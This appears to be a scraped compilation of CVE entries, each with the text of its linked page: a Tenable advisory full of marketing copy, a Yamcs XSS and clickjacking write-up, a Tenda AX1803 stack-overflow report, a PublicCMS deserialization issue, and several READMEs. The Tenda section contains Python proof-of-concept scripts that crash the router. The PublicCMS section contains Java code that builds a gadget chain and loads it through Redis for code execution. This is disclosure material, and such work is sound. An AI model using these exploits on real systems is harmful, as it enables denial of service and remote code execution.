
An arbitrary file write vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus Rules variables to overwrite arbitrary files on the remote host, which could lead to a denial of service condition. 



_This page contains information regarding security vulnerabilities that may impact Tenable's products. This may include issues specific to our software, or due to the use of third-party libraries within our software. Tenable strongly encourages users to ensure that they upgrade or apply relevant patches in a timely manner._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

**Tenable Advisory ID:** TNS-2023-39

**Risk Factor:** Medium

**Credit:**  
Ammarit Thongthua and Sarun Pornjarungsak of Secure D Research Team

**CVSSv3 Base / Temporal Score:**  
6.8 / 6.1

**CVSSv3 Vector:**  
AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H/E:P/RL:O/RC:C

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

100 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2023-6062: [R1] Nessus Version 10.5.7 Fixes One Vulnerability

An issue in Yamcs 5.8.6 allows attackers to send aribitrary telelcommands in a Command Stack via Clickjacking.

_Written by:_ **Andy Olchawa**_,_ **Milenko Starcik**

Vulnerabilities in critical systems like Yamcs can have far-reaching consequences. In this article, we'll get straight to the point and delve into some technical details about security concerns we've unearthed: Stored Cross-Site Scripting (XSS) in ScriptViewer and Archive Browser and Clickjacking in Yamcs version 5.8.6. We'll explore the technical aspects of these vulnerabilities and provide practical recommendations to bolster the security of your Yamcs deployment.

Three CVEs have been assigned and are discussed in this article:

*   Stored XSS in the Script Viewer: CVE-2023-46471
    
*   Stored XSS in the Archive Browser: CVE-2023-46470
    
*   Clickjacking: CVE-2023-47311
    

Make sure to check the five vulnerabilities already discussed in our previous article.

**Stored XSS in the ScriptViewer**

The ScriptViewer component of Yamcs is vulnerable to stored XSS. The vulnerability can be triggered by loading a malicious script or by saving and reloading the script.

_Figure 1 Location in the code of ScriptViewer that is vulnerable to XSS._

_Figure 1_ shows the location in the code that is vulnerable to XSS. The text variable (script content) is not sanitised for HTML tags. This makes it possible to embed a malicious JavaScript code in the script file, which, instead of displaying the snippet, the browser will execute it.

To demonstrate this, let’s create a script file that contains an image which triggers an arbitrary JavaScript code, as shown in _Figure 2_.

_Figure 2 Example of the script containing malicious code._

Once we load the file to Yamcs and navigate to it, we’ll see that the code, instead of being shown, is executed by the browser, as can be observed in the figure below.

_Figure 3 XSS being triggered._

Note that the malicious is not visible in the editor, which means that the user has no way of knowing that the malicious code is being executed on their browser.

This vulnerability is challenging to detect if the loaded script contains an extended, legit JavaScript code.

Theoretically, the user could review the script code before loading it to the ScriptViewer. However, it might be easy to trick the user’s eyes as the malicious part of the code can be disguised as a comment describing the valid JavaScript code and, therefore, harmless at first glance.

_Figure 4_ shows how the attack described above could be achieved. This becomes even more difficult to detect when the script is loaded to the ScriptViewer, as the malicious code will no longer be visible. _Figure 5_ demonstrates how the malicious code triggers the XSS, yet it is hidden once the script is loaded.

_Figure 4 Embedding malicious JavaScript code in a valid script._

_Figure 5 Loaded script that triggered the XSS._

We recommend that the script content should be sanitised, removing the HTML tags.

**Stored XSS in the Archive Browser**

The Yamcs Archive Browser is vulnerable to XSS when displaying the Telecommands uplinked to the spacecraft (in our case, a spacecraft simulator). The exact location in the code that triggers this vulnerability is shown in _Figure 6_.

_Figure 6 Location in the code that triggers the XSS._

To exploit this vulnerability, it is possible to create (or modify an existing) Telecommand, setting its name to a malicious JavaScript payload. The mission database containing the telemetry and telecommanding definitions is stored in an Excel spreadsheet, which Yamcs reads.

_Figure 7 Telecommand definition containing a malicious code in its name._

_Figure 7_ shows a malicious JavaScript code appended to the end of the name of a Telecommand. This Telecommand can then be loaded on Yamcs and released to a spacecraft or simulator it connects to, as demonstrated in _Figure 8_ and _Figure 9_.

_Figure 8 Sending a Telecommand to spacecraft._

_Figure 9 Successful release of the Telecommand._

The figures above show that the Telecommand name is displayed in many places when navigating through Yamcs, and it seems to be correctly sanitised – i.e., the command name is properly displayed, and the browser doesn’t execute the malicious code.

However, this Telecommand can also be displayed on the Archive Browser as a timeline. The Archive Browser content is drawn on a JavaScript canvas, so it shouldn’t trigger the execution of malicious code. However, the timeline component also implements a Tooltip functionality, which loads the HTML and executes JavaScript.

To trigger this XSS vulnerability, after the Telecommand is released, the user can navigate to the Archive Browser, zoom in on the timeline to review the Telecommands and hover the mouse cursor over one of the Telecommands containing the malicious JavaScript. This will display the mentioned Tooltip, which will trigger the XSS. This scenario can be observed in _Figure 10_.

_Figure 10 Triggered XSS from the Archive Browser._

**Recommendation:**

To mitigate this vulnerability, the mission database values should be sanitised at the load time and before they are displayed.

**Clickjacking**

Yamcs 5.8.6 is vulnerable to Clickjacking. This means that an attacker can create a website that would encourage the user to perform specific actions (e.g., click on a button), thinking that they interact with an unrelated website, while instead, they would be unknowingly performing activities on Yamcs. This type of vulnerability can have an exceptionally high impact on control systems, such as Yamcs.

To demonstrate the impact of this vulnerability on Yamcs, we have prepared a scenario where a user can unknowingly send Telecommands to the spacecraft by interacting with a supposedly unrelated website. First, let’s create an example HTML page containing only a label component that encourages users to click on it (see _Figure 11_).

_Figure 11 Clickjacking HTML_

The HTML code above will create a hidden iframe that loads the Yamcs website and a simple div tag on top of it. We will then host it on our local machine (see _Figure 12_), and once the user loads it, it will look like a regular blank page with one label on it (see _Figure 13_).

_Figure 12 Hosting a clickjacking page._

_Figure 13 Loading a clickjacking page._

For the sake of demonstration, we will increase the opacity of the iframe to see what is happening under the seemingly blank page (see _Figure 14_).

_Figure 14 Increased opacity of the iframe._

Once the page is refreshed, we should see the content of the Yamcs page below (see _Figure 15_).

One of the Yamcs functionalities is to release a Command Stack (a file containing a list of Telecommands) to the Spacecraft or a simulator. _Figure 16_ shows the content of the Command Stack that we have used for this demo.

_Figure 15 Clickjacking page with higher opacity._

_Figure 16 Command Stack used for the demo._

The content of the Command Stack doesn’t matter, but it’s important to note the Telecommand names, as we will compare them later to the archive’s content. _Figure 17_ shows an Archive Browser that is currently empty, i.e., it doesn’t contain any spacecraft Telecommands. As we saw in _Figure 15_, the “Click me” label overlays the “Run All” button. Once the user clicks the label, we should see how all Telecommands from the Command Stack are being released (see _Figure 34_).

_Figure 17 Archive Browser with no Telecommands._

_Figure 18 Telecommands being released._

 To verify that the Telecommands were sent, we can navigate to the Archive Browser and observe the new entries showing the released Telecommands (see _Figure 19_).

_Figure 19 Archive Browser containing the release of Telecommands._

We recommend implementing the Clickjacking defences by the OWASP.

**Further readings**

We have published a series of articles about our vulnerability assessment of NASAs Open MCT software. Make sure to read the first article about prototype pollution and the second on XSS. We cover more general space related topics on our blog.

CVE-2023-47311: More XSS and Clickjacking in Yamcs v5.8.6

Certain WithSecure products allow Local Privilege Escalation. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, and WithSecure Elements Endpoint Protection 17 and later.

On October 26, 2023, a high severity vulnerability was discovered in WithSecure Endpoint Protection solutions for Microsoft Windows. 

During investigation, we found that the affected component is used in the following WithSecure™ products:

*   WithSecure Client Security 15 onwards
    
*   WithSecure Server Security 15 onwards
    
*   WithSecure Email and Server Security 15 onwards
    
*   WithSecure Elements Endpoint Protection 17 onwards
    

This vulnerability allows for a local user with administrator privileges to corrupt kernel memory, leading to potential local privilege escalation.

WithSecure is not aware of any known exploits for this vulnerability.

We will update the advisory page as additional information becomes available.

CVE-2023-47172: CVE-2023-NNN4

Tenda AX1803 v1.0.0.1 was discovered to contain a stack overflow via the time parameter in the function saveParentControlInfo . This vulnerability allows attackers to cause a Denial of Service (DoS) attack

**Vulnerability introduction**

Tenda AX1803 firmware version v1.0.0.1 has a stack overflow vulnerability because it uses the strcpy function by mistake in the deviceId、time and urls parameter of the saveParentControlInfo function which can cause a Denial of Service (DoS) attck.  
Firmware download address:https://down.tenda.com.cn/uploadfile/AX1803/AX1803V2.0\_V1.0.0.1\_cn.zip

**Vulnerability analysis****deviceId parameter in the function saveParentControlInfo**

In the binary file /bin/tdhttpd, we use IDA to locate the function saveParentControlInfo that causes the vulnerability.  

As you can see, the strcpy function is called on line 28 of the saveParentControlInfo function. Let’s trace the source of the two parameters of the strcpy function.  

We found that parameter v2 was generated when the sub\_295C8 function processed the deviceId parameter, and v5 was malloced on the heap.  
As we all know, strcpy does not check the length of the parameter. If the deviceId is assigned a long string such as b"a"\*0x400, it will cause a heap overflow in saveParentControlInfo, causing the entire program to crash and achieve the effect of a denial of service attack (Dos)  
exp:

    import requests
     
    def deviceId():
          data = {
              b"deviceId":b"A"*0x400,
              b"deviceName": b'a',
              b"time": b'a',
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a',
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    deviceId()

**time parameter in the function saveParentControlInfo**

In line 34 of the saveParentControlInfo function, the sub\_60CFC function is called, and this function calls sub\_295C8 to obtain the time field.  

However, after obtaining the time parameter, the obtained time is simply assigned to v4, and strcpy is directly called to pass it to the variable (a2+34) on the stack, without any verification in the middle. it will cause a stack overflow We assign the time field to b'a'\*0x400 as before,which caused the program to crash.  

exp:

    import requests
     
    def time():
          data = {
              b"deviceId":b"A",
              b"deviceName": b'a',
              b"time": b'a'*0x400,
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a',
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    time()

**urls parameter in the function saveParentControlInfo**

In line 34 of the saveParentControlInfo function, the sub\_60CFC function is called, and this function calls sub\_295C8 to obtain the time field.  

Like the previous deviceId field, the program simply took out the urls without checking the length. Therefore, when the program passed time to (a2 + 80) through strcpy, a heap overflow occurred.  
exp:

    import requests
     
    def urls():
          data = {
              b"deviceId":b"A",
              b"deviceName": b'a',
              b"time": b'a',
              b"enable":b'1',
              b'url_enable':b'1',
              b'urls':b'a'*0x400,
              b'day':b'1',
              b'block':b'0',
              b'limit_type':b'1'
          }
          res = requests.post("http://192.168.44.128/goform/saveParentControlInfo", data=data)
          print(res.content)
    
    
    urls()

**environment**

Create a new net bridge

    sudo apt install uml-utilities bridge-utils
     sudo brctl addbr br0
     sudo brctl addif br0 ens33
     sudo ifconfig br0 up
     sudo dhclient br0

Install libc for arm environment and copy qemu-arm-static to the firmware root folder

    sudo apt install qemu-user-static libc6-arm* libc6-dev-arm*
    cp $(which qemu-arm-static) .
    sudo chroot ./ ./qemu-arm-static  ./bin/tdhttpd

use  
sudo qemu-arm-static -L ../ ./tdhttpd  
to simulates running firmware

Now we can access http://192.168.44.128/main.html to enter the virtual router for testing

CVE-2023-48111: Tenda AX1803 was discovered  A series of fatal vulnerabilities that can cause a Denial of Service (DoS)

Deserialization of Untrusted Data in PublicCMS v.4.0.202302.e allows a remote attacker to execute arbitrary code via a crafted script to the writeReplace function.

Hello,I found a Deserialization vulnerability in the lastest version of PublicCMS- V4.0.202302.e

The prerequisite for this vulnerability is that the website uses redis cache and needs to obtain redis control permission to initiate deserialization, because redis will trigger deserialization when obtaining the value through the get function.

Then there is the deserialization gadget chain. Jackson and spring exist in the website dependencies. After testing, you can use the following deserialization chain.

BadAttributeValueExpException->POJOnode->TemplatesImpl。

The core code is as follows

    public static void main( String\[\] args ) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass\[\]{},ctClass);
        constructor.setBody("open -a /System/Applications/Calculator.app");
        ctClass.addConstructor(constructor);
        byte\[\] bytes = ctClass.toBytecode();
        TemplatesImpl templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "\_bytecodes", new byte\[\]\[\]{bytes});
        setFieldValue(templatesImpl, "\_name", "boogipop");
        setFieldValue(templatesImpl, "\_tfactory", null);
        POJOnode1 jsonNodes = new POJOnode1(templatesImpl);
        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(exp,jsonNodes);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(exp);
        FileOutputStream fout\=new FileOutputStream("1.ser");
        fout.write(barr.toByteArray());
        fout.close();
        FileInputStream fileInputStream = new FileInputStream("1.ser");
        System.out.println(serial(exp));
        deserialize(serial(exp));
    }
        public static byte\[\] serial(Object o) throws IOException, NoSuchFieldException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();
        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
        System.out.println(bytesToHex(baos.toByteArray()));
// 设置Redis数据库连接参数
        String host = "localhost";
        int port = 6379;
        String password = "root";
        Jedis jedis = new Jedis(host, port);
        jedis.auth(password);
        jedis.set("test".getBytes(), baos.toByteArray());
        return baos.toByteArray();

    }

But you need to pay attention to one detail. You need to rewrite a writeReplace method, because this function will replace some data during the serialization process, causing deserialization errors.  
  

Reconstruct the BaseJsonNode.writeReplace function in the jar package, making sure to keep the path consistent.  

If you only need to try rce locally, you can write it more conveniently like this.Rewrite it with the following code

import com.fasterxml.jackson.databind.node.POJONode;

import java.util.GregorianCalendar;

public class POJOnode1 extends POJONode {
    public POJOnode1(Object v) {
        super(v);
    }

    Object writeReplace() {
        GregorianCalendar NodeSerialization;
        return this;
    }
}

so now, you can use the above code to write the serialized hex data to redis。  

When you use redis cache, the database will become like this

So if you can control the redis database at this time, you only need to change one of the domain.localhost or some other impairment to trigger deserialization to reach rce。Like the following main  

Just visit the website now。

CVE-2023-46990: Trigger deserialization rce through redis cache · Issue #76 · sanluan/PublicCMS

Cross Site Scripting (XSS) vulnerability in the component /shells/embedder.html of DZSlides after v2011.07.25 allows attackers to execute arbitrary code via a crafted payload.

**Basic usage**

**DZSlides** is a **one-file** HTML template to build slides in HTML5 and CSS3.

template.html is the only file you need. Edit the file, add your content, change the style, and you're done. To see the slides in action, just load the file in your browser.

**Features**

*   Slides can include any HTML5 content (text, image, video, iframes, …);
*   Slides transitions are animated with CSS3 (sliding by default);
*   Resolution independent (slides are scaled according to the size of the browser. The virtual dimension is 800x600);
*   Fullscreen presentation (HTML5 FullScreen API supported) - press f to go fullscreen;
*   Incremental content;
*   Mobile Friendly (supports touch events);
*   Printing to PDF

**Shells**

The features of DZSlides are intentionally limited to keep the template light and simple to understand. _Shells_ are extensions that bring new features to your slides. Here, you'll find 2 shells:

*   shells/embedder.html to embed a presentation in a web page
*   shells/onstage.html to show your slides with a control panel

To use them, just load the file in your browser, and follow the instructions.

**Specifications**

When you press the left and right keys, you go forward and go back in your slides. But the slides can also respond to external messages. Messages can be sent through postMessage. So another web page can control the slides.

**Protocol**

A cursor is a string of this form: 3.5. The first number represent the current slide index. The second number represent the current sub-item index.

Parameters must be escaped.

Messages a DZSlides page can receive:

*   REGISTER register the source of the message as a target to notify for any events;
*   FORWARD move forward in the slides;
*   BACK move back in the slides;
*   START move to the first slide;
*   END move to the last slide;
*   SET_CURSOR cursor jump to the cursor;
*   GET_CURSOR notify the source of the message of the current cursor;
*   TOGGLE_CONTENT toggle the current slide content;
*   GET_NOTES cursor notify the source of the message of the current notes content.

Messages a DZSlides page can send:

*   CURSOR cursor sent to one target as a response to GET_CURSOR, and sent to all the registered target when updated;
*   REGISTERED slides_title slides_count sent to one target as a response to REGISTER;
*   NOTES html_content sent to one target as a response to GET_NOTES.

**Hash parameters**

*   url&para1=va1

Parameters a DZSlides page can have:

*   autoplay (integer, values : 0/1, default : 1) sets whether multimedia contents (audio, video) should be played automatically.

**License**

                DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
                        Version 2, December 2004
    
    Everyone is permitted to copy and distribute verbatim or modified
    copies of this license document, and changing it is allowed as long
    as the name is changed.
    
                DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
      TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
    
    0. You just DO WHAT THE FUCK YOU WANT TO.
    

**Todo ideas**

*   Allow many elements to have the same next-order number — and activate them all at the same time.
*   2D presentation structure as in flowtime.js or reveal.js. Many presentations fit naturally into it, even in this template.html slides could be arranged in a 2D grid (in the overview) where every Part starts a new row of slides.

CVE-2023-47417: GitHub - paulrouget/dzslides: DZSlides is a one-file HTML template to build slides in HTML5 and CSS3.

Buffer Overflow vulnerability in Tenda Ac19 v.1.0, AC18, AC9 v.1.0, AC6 v.2.0 and v.1.0 allows a remote attacker to execute arbitrary code via the formSetCfm function in bin/httpd.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-38823: CVE_report/CVE-2023-38823.md at master · nhtri2003gmail/CVE_report

The Magic Embeds WordPress plugin before 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

CVE-2023-4799

The Community Edition version 9.0 of OS4ED's openSIS Classic allows remote attackers to read arbitrary files via a directory traversal vulnerability in the 'filename' parameter of 'DownloadWindow.php'.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**12** branches **12** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

Commit regarding security fixes

4450e84

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**openSIS Classic**

Community Edition version 9.0 (Rel date: 12/31/2022) Created by OS4ED

openSIS is an easy to use Student Information System for organizing student information and school-related operations to promote efficiency in K-12, trade schools and higher education school systems.

**Key Features**

*   Manage Student Data
*   Manage Staff Data
*   Manage School Data
*   Course Manager
*   Scheduling
*   Attendance
*   Grades
*   Teacher Gradebook
*   Progress Reports
*   Report Cards
*   Transcripts
*   Built-in Communication
*   Bulk data imports

**Installation**

openSIS Community Edition requires

*   Apache 2.4 or above
*   MySQL 5.7, 8.0 or Maria DB 10.4.x
*   PHP 8.x

Installation Details

**License**

openSIS is an Open Source Project licensed under the GNU General Public License, the full license can be found here.

**About**

openSIS is a commercial grade, secure, scalable & intuitive Student Information System, School Management Software from OS4ED. Has all functionalities to run single or multiple institutions in one installation. Web based, php code, MySQL database.

**Topics****Resources**

Readme

Activity

**Stars**

**170** stars

**Watchers**

**22** watching

**Forks**

**167** forks

CVE-2023-38879: GitHub - OS4ED/openSIS-Classic: openSIS is a commercial grade, secure, scalable & intuitive Student Information System, School Management Software from OS4ED. Has all functionalities to run single or 








Texas Instruments TI-RTOS, when configured to use HeapMem heap(default), malloc returns a valid pointer to a small buffer on extremely large values, which can trigger an integer overflow vulnerability in 'HeapMem_allocUnprotected' and result in code execution. 







